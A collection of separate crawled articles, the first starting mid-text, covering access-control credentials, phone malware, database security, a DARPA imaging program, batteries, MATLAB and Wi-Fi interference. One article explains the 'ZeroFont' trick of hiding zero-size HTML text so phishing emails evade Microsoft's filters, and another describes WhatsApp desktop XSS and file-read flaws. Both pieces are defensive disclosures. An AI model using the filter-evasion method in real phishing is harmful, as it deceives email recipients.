Access control systems that use Mobile credentials use your smartphone instead of a card or other credential. A mobile credential is an authorization token much like a Prox card or keyfob. The ID number is held in your smartphone instead of a card. That’s why we call it a mobile credential. Just like other types of credentials, it contains a unique number that can be used as the electronic key to open a door with an electric lock.
The smartphone can connect to a door reader using Bluetooth, NFC, or even WiFi. Bluetooth (BLE) is the most common type of communication used in the security market.
If you want to use your smartphone as the credential, you must select a reader that operates with the Bluetooth connected smartphone. Some of these mobile-enabled readers will support both proximity and mobile credentials. Door readers from Isonas and Hartmann Controls include the mobile credential capability.
How RFID Door Access Readers Work
The RFID door readers use credentials that have embedded circuits and an antenna. The reader broadcasts a signal that is received by the credential antenna. The transmitted electrical signal from the door reader contains enough power to energize the circuit in the credential. Once the electric circuit in the credential receives the power, it sends back a signal to the access control reader that includes its identification (ID) number. For more details about this, read the article, How Door Access Control Works.
A Biometric credential is an authentication using the metric of a person such as a fingerprint, vein pattern, or face recognition. The credential is the registered code associated with that biometric and is given a unique ID number in the access control system. Special biometric readers are required to detect the person’s characteristics.
Summary of Door Access Credentials
There are several types of credentials that are used to gain entry using an access control door reader. Thin cards, thick cards for lanyards, and keyfobs or even your mobile phone can be used for a credential. HID and other proprietary protocols are used to transfer the information from the credential to the reader. It is always important to make sure that the door reader and the credential are compatible.
If you would like help selecting your access control system, please contact us at 1-800-431-1658 in the USA, or at 914-944-3425 everywhere else, or use our contact form. | <urn:uuid:d157084a-25d2-4f7c-a9c9-d7c78127d255> | CC-MAIN-2022-40 | https://kintronics.com/comparison-door-access-credentials/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00161.warc.gz | en | 0.92247 | 1,639 | 2.734375 | 3 |
When people think of viruses and malware, the first things that come to mind are cyberattacks that cost enterprises millions of dollars in damages. But with more people switching from desktops to mobile devices, hackers have also started infiltrating cellphones to get sensitive information from people.
So is it possible to get malware on mobile devices? Phones don’t have the same security systems as computers, which makes them more vulnerable to several types of malware. Mobile devices usually get malware from malicious apps, operating system vulnerabilities, suspicious emails, non-secure wi-fi and URLs, and text or email phishing.
Why Are Phones Vulnerable to Malware?
People use smartphones for just about everything – even for work. Most people find phones more convenient, less expensive, and more mobile when it comes to storing and accessing data that are important for work. But while it has its fair share of advantages, phones in the office might also be threatening the business without the user realizing it.
The main reason why phones are vulnerable to different kinds of malware is that most phones don’t have the same security systems that workstations and servers utilize. They don’t have built-in firewalls, antivirus software, and encryption systems like computers do. The company’s IT teams should have different policies in place when it comes to accessing important information through mobile devices to avoid cyber theft through malware.
Another important thing to remember is that some phones are more likely to develop malware than others – Android devices account for 47.15% of all infected gadgets while only around 1% of them use iOS. Make sure to consider these things before allowing mobile devices to access sensitive business information.
5 Ways a Phone Gets Malware
Finding out how a phone gets malware makes it easier for employees to avoid infecting their devices. Here are some of the most common ways that a phone gets malware and other malicious content:
- Malicious Apps
Apps and downloads are the most common methods that hackers use to gain access to mobile devices. Most apps from the official app store are safe, but some of them might contain malware if they come from non-legitimate sources. These malicious apps appear safe, but they’re typically filled with spyware or other kinds of malware.
Some developers also make the mistake of utilizing pirated development tools. This might compromise the quality of the app, because the end product contains malicious codes used for damaging the device or stealing sensitive data. Always remember to check the app store where you’re downloading the app to prevent getting malware.
- Operating System Vulnerabilities
Sometimes, the mobile device itself has different vulnerabilities that hackers might exploit to gain access. Most of these vulnerabilities are easy to discover and patch up for users who regularly update their software. Keeping the device up to date keeps hackers from taking advantage of the vulnerabilities in the phone’s operating system.
- Suspicious Emails
One of the reasons why employees use mobile devices for work is that phones make it easy for them to answer work-related calls and emails. But without the right cybersecurity education for the employees, they’re likely to fall victim to the malware in suspicious emails.
One classic example of harmful emails that get unsuspecting employees is when the email says they’ve won something. They’re taken to a non-secure link or a dummy site. Clicking the link allows the malware to enter the phone, making all the data stored there exposed to the hackers.
- Non-Secure URLs and Wi-Fi
Using non-secure websites exposes users to the risk of transmitting malware to the device. It makes the device more susceptible to “man-in-the-middle” attacks. When accessing these kinds of websites, make sure that the VPN is active first or that the phone’s antivirus protection is working well.
Sometimes, the phone’s browser itself is a source of vulnerabilities, which leads to web browser attacks. These are quite common in Android phones, so make sure to always update the operating system as needed.
- Text Message and Voicemail Phishing
Aside from suspicious emails, employees may also get voicemails or text messages from a seemingly trusted source. They usually ask for information about the victim or the device they’re using, which the hackers use to steal other important data like credit card information and social security numbers.
If you encounter something similar, the first thing to do is to check with the company’s phone and verify the call with them. Legitimate companies don’t ask for sensitive information through text, so never reply to suspicious texts until the concerned company has been directly contacted.
8 Signs of Malware on Phones
Most kinds of viruses and malware are made to steal and manipulate data, but they also affect the phone’s performance. If the device shows any of these signs, there’s a huge chance that it’s infected with the malware:
- Excessive Data Usage – Phone viruses usually run as a background app, which is why they’re often undetected. One good way to spot them is to check the phone’s data usage. A sudden and unexplainable increase in overall data usage means there’s malware in the device.
- Fraudulent Charges – Some kinds of malicious mobile content drive up credit card bills with text charges and in-app purchases. Hackers use the bank information to force users to pay for “premium” accounts which they collect the money from.
- Crashing Apps – Compromised phones experience crashing apps more often than other mobile devices. There are several reasons why apps may crash, such as too many running apps or full storage. If the apps are still crashing even after cleaning the storage or closing most of them, then it’s time to check the device for viruses or malware.
- Pop-Ups – Ads popping up on the screen is a normal advertising strategy when browsing through the web. However, if the device still has pop-ups even after closing the browser, then it might be caused by the presence of adware. Adware is a specific type of phone virus that’s used for data mining.
- Quick Battery Drain – Aside from the excessive data usage, the malware also drains the phone’s battery quickly because of the sudden increased use of RAM. Some phones may also have battery problems so make sure to rule that out first before checking the device for malware and viruses.
- Unrecognizable Apps – Apps that seemingly appear out of nowhere are usually caused by malware. Trojan horses often disguise themselves as legitimate-looking apps that cause severe damages to the phone. They may also attach themselves to other legitimate applications.
- Overheating – Since malware also consumes CPU and RAM usage, it causes the phone to overheat. Although the occasional overheating is normal for most phones, chronic overheating issues might be a sign of a more serious cyberthreat.
- Spam Text – This is a common type of malware found in most mobile devices. Spam texts gather sensitive data from the phone. They might also infect other contacts by sending malicious attachments and links without the owner’s knowledge.
Tips to Protect the Mobile Device from Malware
While mobile devices are prone to malware attacks, there are still a few ways to avoid them. Here are some helpful tips to protect your smartphone from cyberattacks:
- Don’t jailbreak the device. When a person jailbreaks their phone, they remove all the built-in security systems of the device. This allows them to do more with their phone, but it also makes the device vulnerable to different kinds of malware and viruses on the internet.
- Connect to secure Wi-Fi networks. Aside from a secure Wi-Fi network, using a VPN also prevents hackers from entering the network and interrupting the data flow. A VPN (Virtual Private Network) allows secure information sharing across different devices even when using public Wi-Fi networks.
- Install trusted antivirus software. Like in desktops, good antivirus software is the phone’s best line of defense against different types of malware, viruses, and other malicious content. Make sure to run the software and remove threats regularly.
- Keep the operating system updated. Sometimes, the phone’s operating system itself has vulnerabilities that hackers use to gain access to different kinds of sensitive information. Updating the phone’s OS regularly gets rid of these vulnerabilities because new updates have patches that eliminate the bugs from the previous versions.
- Never open suspicious messages. Strange texts, links, email attachments often lead to phishing sites. Never reply to suspicious messages with personal information, unless you’ve already confirmed that their source is trustworthy.
- Download apps from trusted app stores and sources. Apps are also another gateway to malware or phishing sites, so make sure to only download them from official app stores.
- Educate employees about mobile device policies. Since employees use their phones when accessing sensitive company information, they should be aware of the different kinds of malware, how dangerous they are, and how to avoid them. It’s also important to have security regulations about the use of smartphones for work.
Keep All Your Device Secure with Abacus
When it comes to strengthening a company’s cybersecurity systems, it’s important to treat mobile devices the same as servers and computers. Hackers exploit any kind of opening they can use to steal sensitive information from the company, so it’s essential to have a comprehensive security system that works on all devices.
Here at Abacus, we understand how important it is for companies to maintain confidentiality and security. Our team of IT experts is here to eliminate vulnerabilities, maximize protection, and provide the best cyber solutions for the company. Call us now to experience the Abacus Advantage. | <urn:uuid:3df79339-1fff-42b2-bbf1-09ac5933f1f4> | CC-MAIN-2022-40 | https://goabacus.com/can-you-get-malware-on-your-phone/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00362.warc.gz | en | 0.917074 | 2,021 | 2.75 | 3 |
Database security is a broad section of information security that concerns itself with protecting databases against compromises of their integrity, confidentiality and availability. It covers various security controls for the information itself stored and processed in database systems, underlying computing and network infrastructures, as well as applications accessing the data.
1 Management Summary
Databases are arguably still the most widespread technology for storing and managing business-critical digital information. Manufacturing process parameters, sensitive financial transactions or confidential customer records - all this most valuable corporate data must be protected against compromises of their integrity and confidentiality without affecting their availability for business processes. The area of database security covers various security controls for the information itself stored and processed in database systems, underlying computing and network infrastructures, as well as applications accessing the data.
Among security risks databases are potentially exposed to are the following:
- Data corruption or loss through human errors, programming mistakes or sabotage;
- Inappropriate access to sensitive data by administrators or other accounts with excessive privileges;
- Malware, phishing and other types of cyberattacks that compromise legitimate user accounts;
- Security vulnerabilities or configuration problems in the database software, which may lead to data loss or availability issues;
- Denial of service attacks leading to disruption of legitimate access to data;
Consequently, multiple technologies and solutions have been developed to address these risks, as well as provide better activity monitoring and threat detection. Covering all of them in just one product rating would be quite difficult. Furthermore, KuppingerCole has long stressed the importance of a strategic approach towards information security. Therefore, customers are encouraged to look at database security products not as isolated point solutions, but as a part of an overall corporate security strategy based on a multi-layered architecture and unified by centralized management, governance and analytics.
In this Leadership Compass, however, we are focusing on a relatively narrow segment of database security solutions to avoid comparing functionally distinct products and to exclude market segments already covered in other KuppingerCole’s reports.
First and foremost, we are focusing primarily on security solutions for protecting traditional relational database management systems (RDBMS), which are still by far the most widespread type of databases used by enterprises; however, solutions that extend their protection to NoSQL databases as well are going to be rated higher. Secondly, we are not explicitly covering various general aspects of network or physical server security, identity and access management or other areas of information security not specific for databases, although providing these features or offering integrations with other security products may influence our ratings.
Still, we are putting a strong focus on integration into existing security infrastructures to provide consolidated monitoring, analytics, governance or compliance across multiple types of information stores and applications. Most importantly, this includes integrations with SIEM/SoC solutions, existing identity and access management systems and information security governance technologies.
Solutions offering support for multiple database types as well as extending their coverage to other types of digital information are expected to receive more favorable ratings as opposed to solutions tightly coupled only to a specific database (although we do recognize various benefits of such tight integration as well). The same applies to products supporting multiple deployment scenarios, especially in cloud-based and hybrid infrastructures.
Another crucial area to consider is development of applications based on the Security and Privacy by Design principles, which are soon going to become a legal obligation under the EU’s upcoming General Data Protection Regulation (GDPR). Database security solutions can play an important role in supporting developers in building comprehensive security and privacy-enhancing measures directly into their applications. Such measures may include transparent data encryption and masking, fine-grained dynamic access management, unified security policies across different environments and so on. We are taking these functions into account when calculating vendor ratings for this report as well.
These are the key functional areas of database security solutions we are looking for in this rating:
- Vulnerability assessment – this includes not just discovering known vulnerabilities in database products, but providing complete visibility into complex database infrastructures, detecting misconfigurations and, last but not least, the means for assessing and mitigating these risks.
- Data discovery and classification – although classification alone does not provide any protection, it serves as a crucial first step in defining proper security policies for different data depending on their criticality and compliance requirements.
- Data protection – this includes data encryption at rest and in transit, static and dynamic data masking and other technologies for protecting data integrity and confidentiality.
- Monitoring and analytics – this includes monitoring of database performance characteristics, as well as complete visibility in all access and administrative actions for each instance, including alerting and reporting functions. On top of that, advanced real-time analytics, anomaly detection and SIEM integration can be provided.
- Threat prevention – this includes various methods of protection from cyber-attacks such as denial-of-service or SQL injection, mitigation of unpatched vulnerabilities and other database-specific security measures.
- Access Management – this includes not just basic access controls to database instances, but more sophisticated dynamic policy-based access management, identifying and removing excessive user privileges, managing shared and service accounts, as well as detection and blocking of suspicious user activities.
- Audit and Compliance – this includes advanced auditing mechanisms beyond native capabilities, centralized auditing and reporting across multiple database environments, enforcing separation of duties, as well as tools supporting forensic analysis and compliance audits.
- Performance and Scalability – although not a security feature per se, it is a crucial requirement for all database security solutions to be able to withstand high loads, minimize performance overhead and to support deployments in high availability configurations. For certain critical applications, passive monitoring may still be the only viable option.
Below you will find a short summary of our findings including the diagrams showing vendors’ positions on KuppingerCole Leadership scales.
1.1 Overall Leadership
In the Overall Leadership rating, we find IBM and Oracle among the Leaders, which is completely unsurprising, considering both companies’ global market presence, broad ranges of database security solutions and impressive financial strengths. However, the fact that IBM’s solutions are database-agnostic, while a half of Oracle’s portfolio only focuses on Oracle databases has influenced KuppingerCole’s decision to position IBM as the overall leader in Database Security.
The rest of the vendors are populating the Challengers segment. Lacking the combination of exceptionally strong market and product leadership, they are hanging somewhat behind the leaders, but still deliver mature solutions exceling in certain functional areas. The segment includes both large veteran players with massive customer reach like Imperva, Gemalto, Thales e-Security, McAfee and Fortinet and smaller but impressively innovative companies like HexaTier, MENTIS Software and Axiomatics.
There are no Followers in this rating, indicating overall maturity of the vendors representing the market in our Leadership Compass. Still, there is a number of smaller companies or startups with innovative products entering the market, worth mentioning outside of our rating. These companies are briefly covered in the chapter 14 “Vendors to watch”.
Full article is available for registered users with free trial access or paid subscription.
Register and read on!
Sign up for the Professional or Specialist Subscription Packages to access the entire body of the KuppingerCole research library consisting of 700+ articles. | <urn:uuid:c05aec39-4b87-4fa5-b0b7-8cfd9c6e5692> | CC-MAIN-2022-40 | https://www.kuppingercole.com/research/lc70970/database-security | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00362.warc.gz | en | 0.928821 | 1,506 | 2.703125 | 3 |
DOD is developing new ways to get high-resolution images of spacecraft as part of a plan to build new satellites in orbit from parts salvaged from deactivated crafts.
The Defense Department’s research and development shop is developing a new method to get more detailed images of orbiting satellites.
Better imaging would allow the DOD to select dead or deactivated spacecraft for a related program that would use robots to build new satellites in orbit from parts salvaged from deactivated craft.
The primary goal of the Defense Advanced Research Project Agency’s Galileo program is to get better and timely images of objects in geosynchronous orbit from the ground, said program manager Air Force Lt. Col. Travis Blake.
But Galileo is also intended to support the agency’s Phoenix program, which aims to salvage usable antennas and other components from retired satellites. Being able to image spacecraft is key to the planning aspect of the Phoenix program, Blake said.
The Phoenix program aims to save on the cost of launching new satellites when older ones have died by robotically removing and re-using space apertures and antennas from the old satellites.
The program plans to develop a new class of small "satlets," or nano satellites, that could "ride along" with a commercial satellite and then be “attached to the antenna of a non-functional cooperating satellite robotically, essentially creating a new space system,” DARPA said.
The main challenge Galileo faces is that using ground-based telescopes to get detailed views of object in geosynchronous orbit (22,000 miles) would require mirrors that are too large to build or use efficiently. Instead, DARPA is working on a different imaging technique, interferometric imaging, to get detailed images.
Astronomers use interferometry techniques to track and image objects in space with multiple telescopes. However, this process currently takes time and requires extensive infrastructure such as long light tubes, mirrors and other equipment that inhibits participating telescopes’ range of movement.
DARPA’s goal is to replace the light tubes with flexible fiber optic cable, which would allow telescopes to move more freely on multiple axes, which could significantly speed up the imaging of objects in orbit, Blake said.
Besides checking out non-functional satellites, another benefit of Galileo would be to allow satellite operators to determine if components such as solar panels have deployed properly, which could significantly help in resolving any problems that occur once a vehicle is deployed, he said. | <urn:uuid:47b44c98-a6c4-4313-88bf-8e2c0c515dc8> | CC-MAIN-2022-40 | https://gcn.com/emerging-tech/2012/01/darpa-seeks-ways-to-rebuild-space-junk/280766/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00362.warc.gz | en | 0.937866 | 507 | 3.21875 | 3 |
Recently, we have been seeing a number of phishing attacks using a simple strategy to get their blatant email spoofs past Microsoft's phishing scans. The font manipulation tactic, which we are calling ZeroFont, involves inserting hidden words with a font size of zero that is invisible to the recipient. This is a very old technique, seldom seen anymore, that was once used to bypass spam filters. What makes this attack interesting is that it is now being used to fool Microsoft's natural language processing.
What is natural language processing?
Phishing emails (especially Business Email Compromise attacks) use social engineering and fraudulent text to convince their targets to click a link, enter credentials, or perform some other insecure behavior. In order to block these types of attacks, Microsoft uses natural language processing to scan the content of emails for signs of impersonation or fraud. For example, if the email includes the text "© 2018 Apple Corporation. All rights reserved" in the footer, but the email is not from apple.com, it would be flagged as fraudulent. It uses natural language processing to try to interpret the context or intent of the text and correlate it with the sender. Emails that prompt for things like banking information, user accounts, password resets, and financial requests are scrutinized for authenticity. As Microsoft's filters have become better at reading emails, the attackers are finding ways to fool the language analyzers before they fool the end user. In the ZeroFont method, they have found a way to display different text to the Microsoft filters than what is seen by the end user.
The ZeroFont email
There are multiple examples of the ZeroFont method, but here's a typical scenario.
An email is sent to a customer attempting to impersonate an Office 365 quota limit notification. The message looks like a common administrative service message phishing attack that would normally be caught, but, in this case, it was not flagged by Microsoft as a phishing email. The following image shows what was displayed to the recipient:
The ZeroFont tactic
This email was not flagged by Microsoft is because the hacker inserted random text throughout the email to break up the text strings that would trigger Microsoft's natural language processing. In some cases, random words are used. These inserted characters are embedded within the HTML code <span style="FONT-SIZE: 0px"> to have a font size of zero, making them invisible to the recipient of the email. Below is a screenshot of the raw HTML of the email content, showing the inserted ZeroFont characters.
When the recipient reads the email, all the text with "FONT-SIZE: 0px" disappears, leaving the text the attacker wants her to see. The HTML above looks like this to the user:
On the other hand, because Microsoft's filters read the plain text, regardless of font size, they see a seemingly random string of characters:
Microsoft can not identify this as a spoofing email because it cannot see the word "Microsoft" in the un-emulated version. Essentially, the ZeroFont attack makes it possible to display one message to the anti-phishing filters and another to the end user.
You can see for yourself that what you see and what your anti-phishing filter reads might be completely different.
A Convincing BEC email or phishy text hides within a tot a lly different context . An advanced filter or AI scanner should see what you do. If not, your phishing filter would misread the way you see it.
Natural language processing is a vital and powerful tool in the prevention of email phishing attacks. The ZeroFont method is just one way that attackers use to present one email to the security filters and another to the user. Other attacks use different methods with similar results. For example, the Punycode phishing attack, the Unicode phishing attack, and the Hexadecimal Escape Characters phishing attack. | <urn:uuid:0a0a8922-80ad-4a97-9fd1-7a9c4d88fb6c> | CC-MAIN-2022-40 | https://www.avanan.com/blog/zerofont-phishing-attack | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00362.warc.gz | en | 0.916653 | 796 | 2.828125 | 3 |
A new type of lithium ion battery offering up to ten times the battery life and charging speed of current-generation cells has been announced.
Battery life is one of the biggest hurdles to technological advancement - particularly when it comes to mobiel devices. The biggest gaming laptops (opens in new tab) last only a couple of hours, 'exoskeleton' robots (opens in new tab) require external generators or power cables, and electric cars need a thousand or more batteries of current generation Li ion technology to keep them going for a hundred or so miles. Charging time can also be a problem.
However a team from NorthWestern University in the US could be pointing the way to the future of mobile power. Recently publishing their findings in the journal Advanced Energy Materials, the group's hypothesis for future designs makes for some very interesting reading.
Hexus (opens in new tab) reports that the team's design works by changing the structure of the graphene sheets of a Li ion battery by inserting modules of silicon between them. This material has been considered in the past, since it's able to store four lithium ions per atom of silicon, whereas graphene can only hold one lithium atom per six carbon.
However the traditional problem with using silicon lies in the fact that the semiconductor has a tendency to flex and expand during charging, leading to a loss of capacity over time. The NorthWestern method uses clusters of silicon between sheets of graphene, allowing for the structure to be maintained while increasing the cell's charging capacity at the same time.
Charging time would also be improved, as the new method utilises 'holes' in the graphene sheets to funnel lithium ions straight to the silicon clusters and the next sheet of graphene. In current batteries, lithium ions must travel around each sheet in turn, slowing the process down dramatically.
It's thought that this technology could become commercially available within three to five years. | <urn:uuid:e2813ce5-0f65-4356-b070-da2e51b57c00> | CC-MAIN-2022-40 | https://www.itproportal.com/2011/11/15/new-li-ion-battery-design-offers-10x-capacity/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00362.warc.gz | en | 0.940536 | 383 | 3.234375 | 3 |
Security researcher Gal Weizman from PerimeterX disclosed technical details of a number of dangerous vulnerabilities (united under the common identifier CVE-2019-18426) found in the desktop version of the WhatsApp messenger.
Using these vulnerabilities, attackers could remotely steal files from computers running Windows or macOS.
“I really wanted to find a major security flaw in a well-known and widely used service, and I felt like WhatsApp was a good start. So I gave it a go since I already had some clue of existing security flaws in WhatsApp mobile and web applications. I managed to find four more unique security flaws in WhatsApp which led me all the way to persistent XSS and even reading from the local file system – by using a single message”, — writes Gal Weizman.
In particular, the specialist discovered a potentially dangerous vulnerability such as Open Redirect, which allows conducting an XSS attack by sending a specially crafted message. If the victim sees a malicious message, the attacker can execute arbitrary code in the context of the WhatsApp domain.
Another problem was the incorrectly configured Content Security Policy (CSP) on the WhatsApp web-domain, which allows downloading useful XSS-loads using iframes from a site controlled by an attacker.
“If the CSP rules were correctly configured, the impact of the XSS attack smaller. The ability to bypass the CSP configuration allowed an attacker to steal valuable victim information, easily load external payloads, and much more”, – noted the expert.
Weizmann demonstrated a remote file attack via WhatsApp, gaining access to the contents of the hosts file from the victim’s computer. According to the researcher, the open redirect vulnerability could also be used to manipulate URL banners – a preview of the domain that WhatsApp displays to recipients when they receive a message containing links.
“It is 2020, no product should be allowing a full read from the file system and potentially a RCE from a single message”, – summed up Gal Weizman.
Weizmann announced in Facebook his discovery, and the company released a revised desktop version of the messenger.
What a dumb thing is WhatsApp, only I recently wrote that attacker in a WhatsApp group chat could disable messengers of other participants. However, the Internet and real world are quite dangerous too. | <urn:uuid:004d3ff2-a5a2-40d0-aa04-b4d6f49fde5c> | CC-MAIN-2022-40 | https://gridinsoft.com/blogs/dangerous-vulnerabilities-in-whatsapp-allowed-compromising-millions-of-users/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00362.warc.gz | en | 0.925834 | 473 | 2.59375 | 3 |
Today we learn about a specialized software package called MATLAB which stands for ‘Matrix Laboratory’ used in high performance mathematical calculations , visualizations, and programming environments. It is an interactive interface which provides an environment having hundreds of built in functions for technical computing , graphics, and animations.
We will learn more in detail about MATLAB and know about its history, why it was developed, what is MATLAB framework and its benefits and use cases.
Definition – MATLAB
MATLAB was initially developed to implement a simple approach to matrix software developed by two projects namely – LINPACK (Linear system package) and EISPACK (Eigen system package).
It is a modern programming language environment and a software environment having refined data structures including built in editing and debugging tools for programmers and supports object-oriented programming functionality.
MATLAB was developed in 1970s by Cleve Moler, the chairman of Computer science department at university of New Mexico. Cleve wanted his students to use LINPACK & EISPACK (software libraries for numerical computing, written in FORTRAN), and without knowledge of FORTRAN. In 1984 Cleve Moler with Jack Little & Steve Bangert re-written MATLAB in C language and founded MathWorks. These libraries are known as JACKPAC and later were revised in year 2000 for matrix manipulation and renamed as LAPACK.
MATLAB has five elements each of them described in detail in above diagram.
- Development environment – it has set of tools and facilities which help to use MATLAB operations and files. This comprises of many GUI based tools – MATLAB desktop and command window, command history, editor and debugger, browsers , workspaces, reports, and search path.
- MATLAB Mathematical Function Library – has basic functions like sum, since, cosine, and complex mathematical functions like matrix inverse, matrix eigenvalues, Bessel functions, and fast Fourier transforms.
- MATLAB language – high level matrix/array language with control flow statements , functions, data structure, input/output and object-oriented programming interfaces. It allows both programming in the small and large to develop quick throw away programs to create large and complex application functions.
- Graphics – it has capabilities to display vector and matrices as graphs, as well as annotations and printing of graphs. It contains high level structures for two dimensional and three-dimensional data presentation , image processing, animation. It also has low level structures to customize the display of graphics fully or build complete graphical user interface on MATLAB Applications.
- MATLAB External interface/API – This is a library which allows to write C and FORTAN programs which interact with MATLAB and contains facilities for calling routines from MATLAB (dynamic linking) , calling MATLAB as computational engine and reading and writing MAT format files.
Features and Capabilities
Characteristics/Features of MATLAB
- Supports both symbolic and numerical computing
- High level language mainly for engineering and scientific computing
- Works within desktop environment and provides full features for problem solving, iterations and design
- Can create custom plots for data visualization and tools using built in graphics
- Specific applications are designed to work on specific problems such as data classification, control system design, tuning, and signal analysis.
- Several add on toolboxes to build a wide range of engineering, scientific, and customized user interface applications
- Interfaces are available to work with other programming languages such as C, C++, Java, .NET, Python, SQL, and Hadoop.
- Optimize complex processes and distributed systems
- Real time testing of test control systems and signal processing algorithms
- Development of embedded systems using model-based design
- Develop embedded code for prototypes or production
- Perform parallel computing with large scale systems
- Import or access data from other sources
- Work management by automation of processes
- Working with multiple cloud platforms – MathWorks cloud, AWS, Azure etc.
- Capable of mathematical modelling of complex systems
MATALB Pros and Cons
- Metrices and vector handling efficiently
- Quick analysis and plotting
- Extensive documentation available
- Lots of inbuilt functions FFT, Fuzzy logic, neural nets, numerical integrations, OpenGL etc
- Multithreading support and garbage collection for parallel execution of algorithms
- Best mathematical package libraries to support all fields of mathematics , simple to complex computations
- Fastest IDE for mathematical computation of matrices and linear Algebra
- 2-D and 3-D data visualization ,image processing and animation of high quality
- Slow in comparison to other languages like C or java
Application of MATLAB
- Computational Biology – Biological data computation for analysis, visualization, and modelling
- Control systems – design , testing and implementation
- Data science – Data driven insights to improve designs and decisions
- Deep learning – Design, build and visualize neural networks
- Machine learning – Discovering new patterns to develop predictive models
- Wireless communications – design and testing of wireless communications
- Image processing – Image and video processing
- Internet of things – insight into data by connective embedded systems to Internet
- Data exploration and test automation
- Power electronics – Providing digital control for motors, power converters, and battery systems
- Biotech and pharmaceutical – data analysis for drug discovery, development, clinical trials, and manufacturing
And the list is never ending …. | <urn:uuid:8801838d-653e-419e-bf3e-14b4c680be91> | CC-MAIN-2022-40 | https://networkinterview.com/introduction-to-matlab/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00362.warc.gz | en | 0.888911 | 1,117 | 3.328125 | 3 |
Radio frequency (RF) interference can lead to disastrous problems on wireless LAN deployments. Many companies have gotten by without any troubles, but some have installations that don’t operate nearly as well as planned. The perils of interfering signals from external RF sources are often the culprit. As a result, it’s important that you’re fully aware of RF interference impacts and avoidance techniques.
Impacts of RF interference
As a basis for understanding the problems associated with RF interference in wireless LANs, let’s quickly review how 802.11 stations (client radios and access points) access the wireless (air) medium. Each 802.11 station only transmits packets when there is no other station transmitting. If another station happens to be sending a packet, the other stations will wait until the medium is free. The actual 802.11 medium access protocol is somewhat more complex, but this gives you enough of a starting basis.
RF interference involves the presence of unwanted, interfering RF signals that disrupt normal wireless operations. Because of the 802.11 medium access protocol, an interfering RF signal of sufficient amplitude and frequency can appear as a bogus 802.11 station transmitting a packet. This causes legitimate 802.11 stations to wait for indefinite periods of time before attempting to access the medium until the interfering signal goes away.
To make matters worse, RF interference doesn’t abide by the 802.11 protocols, so the interfering signal may start abruptly while a legitimate 802.11 station is in the process of transmitting a packet. If this occurs, the destination station will receive the packet with errors and not reply to the source station with an acknowledgement. In return, the source station will attempt retransmitting the packet, adding overhead on the network.
Of course this all leads to network latency and unhappy users. In some causes, 802.11 protocols will attempt to continue operation in the presence of RF interference by automatically switching to a lower data rate, which also slows the use of wireless applications. The worst case, which is fairly uncommon, is that the 802.11 stations will hold off until the interfering signal goes completely away, which could be minutes, hours, or days.
Sources of RF interference
With 2.4 GHz wireless LANs, there are several sources of interfering signals, including microwave ovens, cordless phones, Bluetooth-enabled devices, FHSS wireless LANs, and neighboring wireless LANs. The most damaging of these are 2.4 GHz cordless phones that people use extensively in homes and businesses. If one of these phones is in use within the same room as a 2.4GHz (802.11b or 802.11g) wireless LAN, then expect poor wireless LAN performance when the phones are in operation. (Refer to a previous tutorial for results of testing interference from a cordless phone.)
A microwave operating within ten feet or so of an access point may also cause 802.11b/g performance to drop. Of course the oven must be operating for the interference to occur, which may not happen very often depending on the usage of the oven. Bluetooth-enabled devices, such as laptops and PDAs, will cause performance degradations if operating in close proximately to 802.11 stations, especially if the 802.11 station is relatively far (i.e., low signal levels) from the station that it’s communicating with. The presence of FHSS wireless LANs is rare, but when they’re present, expect serious interference to occur. Other wireless LANs, such as one that your neighbor may be operating, can cause interference unless you coordinate the selection of 802.11b/g channels.
Use tools to “see” RF interference
Unless you’re Superman, you can’t directly see RF interference with only your eyes. Sure, you might notice problems in using the network that coincide with use of a device that may be causing the interference, such as turning on a microwave oven and noticing browsing the Internet slow dramatically, but having tools to confirm the source of the RF interference and possibly investigate potential sources of RF interference is crucial. For example, MetaGeek’s Wi-Spy is a relatively inexpensive USB-based Wi-Fi spectrum analyzer that indicates the amplitude of signals across the 2.4GHz frequency band. Figure 1 is a screenshot of the Wi-Spy display with a microwave oven operating ten feet away.
This clearly shows relatively high-level signals emanating from the microwave oven in the upper portion of the 2.4GHz frequency band, which indicates that you should tune any access points near this microwave oven to lower channels. To simplify matters, MetaGeek has an interference identification guide that you can use with Wi-Spy to help pinpoint interfering sources. The benefit of using a spectrum analyzer in this manner is that you can identify the interference faster and avoid guessing if a particular device is (or may) cause interference.
Take action to avoid RF interference
The following are tips you should consider for reducing RF interference issues:
Analyze the potential for RF interference. Do this before installing the wireless LAN by performing an RF site survey. Also, talk to people within the facility and learn about other RF devices that might be in use. This arms you with information that will help when deciding what course of action to take in order to reduce the interference.
Prevent the interfering sources from operating. Once you know the potential sources of RF interference, you may be able to eliminate them by simply turning them off. This is the best way to counter RF interference; however, it’s not always practical. For example, you can’t usually tell the company in the office space next to you to stop using their cordless phones; however, you might be able to disallow the use of Bluetooth-enabled devices or microwave ovens where your 802.11 users reside.
Provide adequate wireless LAN coverage. A good practice for reducing impacts of RF interference is to ensure the wireless LAN has strong signals throughout the areas where users will reside. If signals get to weak, then interfering signals will be more troublesome, similar to when you’re talking to someone and a loud plane flies over your heads. Of course this means doing a thorough RF site survey to determine the most effective number and placement of access point.
Set configuration parameters properly. If you’re deploying 802.11g networks, tune access points to channels that avoid the frequencies of potential interfering signals. This might not always work, but it’s worth a try. For example, as pointed out earlier in this tutorial, microwave ovens generally offer interference in the upper portion of the 2.4GHz band. As a result, you might be able to avoid microwave oven interference by tuning the access points near the microwave oven to channel 1 or 6 instead of 11.
